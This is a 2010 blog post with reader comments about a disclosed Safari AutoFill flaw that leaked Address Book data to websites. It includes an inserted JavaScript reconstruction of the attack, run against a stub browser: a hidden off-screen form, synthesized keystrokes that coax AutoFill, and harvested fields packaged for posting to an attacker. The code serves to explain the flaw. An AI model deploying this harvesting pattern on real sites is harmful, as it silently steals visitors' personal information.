Safari exploit gives your contact info to malicious websites

Secunia's report on security in the first half of 2010 puts Apple at the top for the number of vulnerabilities in its OS; Safari itself ranks slightly better, taking the number two spot among third-party applications right behind Mozilla's Firefox. It may not come as any surprise, then, that a major Safari exploit was publicly disclosed yesterday by Jeremiah Grossman, the founder of WhiteHat Security.
The exploit lets a malicious site read personal data from your Address Book card in both Safari 4 and 5 if you have enabled the option that lets Safari AutoFill web forms with your Address Book information. The user never has to see a form: the whole thing happens automatically, with no indication that the site has just been handed your name, company, city, state, country, email address and whatever other fields you have filled in on your own Address Book entry.
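To make concrete what "without you having any idea" means, here is an added illustration of the attack pattern, written for this page rather than taken from Grossman's demo or from the original post. The attacker's side is a form parked off-screen, a loop of synthesized keystrokes to coax AutoFill (the JavaScript input simulation a commenter below refers to), and a read-back of whatever the browser completed. The victim browser is modelled by a small stub (`makeStubDocument`, a constructed `FAKE_ADDRESS_BOOK` card, and an AutoFill rule that completes a field as soon as a typed prefix matches a stored value) so the file runs under Node; the field names, the stub and the completion rule are assumptions, not Safari's actual implementation.

```javascript
// Added illustration of the attack pattern (a reconstruction for this page, not
// Grossman's demo or code from the article). The victim browser is a stub so
// this runs offline under Node; in a real page you would pass `document` and
// `(type, key) => new KeyboardEvent(type, { key })` instead. The field names
// and the AutoFill completion rule below are assumptions.
const AUTOFILL_FIELDS = ["name", "company", "city", "state", "country", "email"];
const LETTERS = "abcdefghijklmnopqrstuvwxyz";

// 1. A form the user never sees: off-screen, one text input per Address Book
//    attribute that AutoFill knows how to complete.
function buildHiddenForm(doc) {
  const form = doc.createElement("form");
  form.setAttribute("style", "position:absolute;left:-9999px;top:-9999px");
  for (const name of AUTOFILL_FIELDS) {
    const input = doc.createElement("input");
    input.setAttribute("type", "text");
    input.setAttribute("name", name);
    form.appendChild(input);
  }
  doc.body.appendChild(form);
  return form;
}

// 2. "Type" a..z with synthesized key events and stop as soon as AutoFill has
//    completed something beyond the single character we supplied. No keyboard,
//    mouse or visible UI is involved. Returns null if nothing was completed.
function coaxAutofill(input, makeKeyEvent) {
  for (const ch of LETTERS) {
    input.value = ch;                           // the attacker's "keystroke"
    input.dispatchEvent(makeKeyEvent("keydown", ch));
    if (input.value !== ch) return input.value; // AutoFill supplied the rest
  }
  input.value = "";
  return null;
}

// 3. Collect the completed fields and serialise them as the body of a POST the
//    page would fire at the attacker's server.
function harvest(form, makeKeyEvent) {
  const stolen = {};
  for (const input of form.children) {
    const value = coaxAutofill(input, makeKeyEvent);
    if (value !== null) stolen[input.getAttribute("name")] = value;
  }
  return stolen;
}

function toFormBody(fields) {
  return Object.entries(fields)
    .map(([k, v]) => encodeURIComponent(k) + "=" + encodeURIComponent(v))
    .join("&");
}

function runAttack(doc, makeKeyEvent) {
  return harvest(buildHiddenForm(doc), makeKeyEvent);
}

// --- Stub of the victim browser, so this runs without Safari ----------------
// Constructed Address Book card (made up for this example).
const FAKE_ADDRESS_BOOK = {
  name: "alice example", company: "acme corp", city: "cupertino",
  state: "ca", country: "usa", email: "alice@example.test",
};

function makeStubDocument(card) {
  function makeElement(tag) {
    const el = { attrs: {}, children: [], value: "", listeners: {} };
    el.setAttribute = (k, v) => { el.attrs[k] = v; };
    el.getAttribute = (k) => el.attrs[k];
    el.appendChild = (child) => { el.children.push(child); return child; };
    el.addEventListener = (type, fn) => {
      (el.listeners[type] = el.listeners[type] || []).push(fn);
    };
    el.dispatchEvent = (ev) => {
      (el.listeners[ev.type] || []).forEach((fn) => fn.call(el, ev));
      return true;
    };
    // Assumed AutoFill model: a keystroke in a field whose name matches a card
    // attribute, with the typed text a prefix of the stored value, completes it.
    if (tag === "input") {
      el.addEventListener("keydown", () => {
        const stored = card[el.attrs.name];
        if (stored && el.value && stored.startsWith(el.value)) el.value = stored;
      });
    }
    return el;
  }
  return {
    body: makeElement("body"),
    createElement: makeElement,
    makeKeyEvent: (type, key) => ({ type, key }),
  };
}

// Offline run against the stub: every field comes back with zero interaction.
const stubDoc = makeStubDocument(FAKE_ADDRESS_BOOK);
console.log(toFormBody(runAttack(stubDoc, stubDoc.makeKeyEvent)));
```

The point the stub makes is the one the article makes: the only precondition is that AutoFill from the Address Book is switched on, and the page that does the harvesting can be any page you happen to load.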

It's important to note that this vulnerability applies to Safari for Windows as well, though there it will only yield the personal information you have explicitly typed into Safari forms yourself.
Grossman also notes that he reported the vulnerability privately to Apple on June 17th.
[Hat tip Techmeme & Ars Technica]
Someone else pointed out that there is a working demo, but even if there weren't, the theory behind the attack doesn't push any boundaries - all the technologies it describes are well-established and predictable, unless Safari had some unknown defence in place against JavaScript input simulation.
I turned off autocomplete from address book the moment I saw this, and hope Apple sees it as a flaw and offers a fix.
I promise guys, I'll make sure not to write a rush post without having consumed some coffee yet. ;-)
/me embarrassed.
For what it's worth, I'm always happier to read stories later with more/better information than first with less. +1 for having presence amid criticism, Chris.
July 22 2010 at 11:18 PM

Sure I'm biased, everyone is biased. Personally, my bias is that while I've flirted with just about every browser out there, Safari is my one true love (well, now that it has extensions. :)
I would also point out that other credible publications are reporting the list from that report with Apple on top for number, not severity, of security issues. This isn't some random nobody security company. Hit the Ars link, you don't get more credible than them.
You're right, there may not be a *malicious exploit* out in the wild but I think the demo of the exploit linked in his article should be classified as an exploit, as willyu34 already pointed out.
You are not supposed to believe everything from the Internet; that's why you have to do research on claims.
If you did bother to do ANY kind of research, or even read the source article before you call the article bullshit, you'd realize that Jeremiah Grossman ALREADY has a WORKING DEMO which he'll be showing people at Black Hat next week. It will show the web server receiving the address book information in the replies, without user interaction.
There's a reason I use 1Password instead of enabling autofill.
July 22 2010 at 3:10 PM

Yeah, REAL anonymous..
"JEREMIAH also mentions that he did report this vulnerability privately to Apple on June 17th."
From Secunia's website:
"Secunia provides free tools for the consumers as we want to ensure that PC users have easy access to reliable vulnerability management tools."
What market share has this free software got? Publicity off Apple's back?
So don't go to malicious sites...
July 22 2010 at 1:10 PM

Sorry, but the days where you only got viruses on adult and warez websites are long gone. Today, usually respectable websites are being compromised, either directly or, for example, through remotely loaded ad banners.
There were a couple of stories, including for example the NY Times website using malicious code, remotely loaded, to attack visitors. The Times reacted quickly, but the ad was still out there for a while.
T.
Good thing I use Chrome...
July 22 2010 at 1:08 PM